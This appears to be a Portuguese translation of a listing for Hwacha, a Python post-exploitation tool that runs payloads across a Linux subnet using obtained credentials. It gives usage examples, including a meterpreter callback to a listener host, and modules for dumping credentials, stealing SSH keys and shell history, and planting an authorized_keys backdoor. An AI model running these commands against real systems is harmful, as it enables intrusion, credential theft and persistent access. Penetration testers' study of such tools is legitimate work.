
Implantar payloads em sistemas *Nix em massa

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha é uma ferramenta para executar rapidamente payloads em sistemas baseados em *Nix. Colete facilmente artefatos ou execute shellcode em toda uma sub-rede de sistemas para os quais as credenciais foram obtidas.
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
To run commands, use -x [COMMAND]
to run modules, use -m [MODULE]
to specify module options, use -o [ARG=ARG ARG=ARG]
to see all available modules, use -L
Example usage:
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
Módulos Disponíveis:
[*] meterpreter Use isto para executar um agente meterpreter no(s) alvo(s).
ARGUMENTOS OBRIGATÓRIOS: LHOST , LPORT
ARGUMENTOS OPCIONAIS: TYPE {python, php, 32, 64, osx}
[*] mimipenguin Use isto para executar um mimipenguin no(s) alvo(s) para recuperar credenciais. (Requer root)
ARGUMENTOS OPCIONAIS: LISTEN
[*] keys Use isto para coletar chaves privadas SSH do(s) alvo(s).
[*] history Use isto para coletar arquivos de histórico do shell do(s) alvo(s).
[*] privs Use isto para enumerar privilégios sudo no(s) alvo(s).
[*] backdoor Cria um par de chaves RSA e adiciona a chave pública ao arquivo authorized_keys no(s) alvo(s).
[*] web_delivery Use isto para executar um script python no(s) alvo(s).
ARGUMENTOS OBRIGATÓRIOS: PATH
ARGUMENTOS OPCIONAIS: LISTEN
[*] custom_bin Use isto para executar um binário personalizado no(s) alvo(s).
ARGUMENTOS OBRIGATÓRIOS: PATH
[*] sudo_exec Use isto para executar um binário personalizado (com sudo) no(s) alvo(s).
ARGUMENTOS OBRIGATÓRIOS: PATH
[*] shellcode Use isto para executar shellcode personalizado no(s) alvo(s).
ARGUMENTOS OBRIGATÓRIOS: PATH
Requer paramiko:
pip install paramiko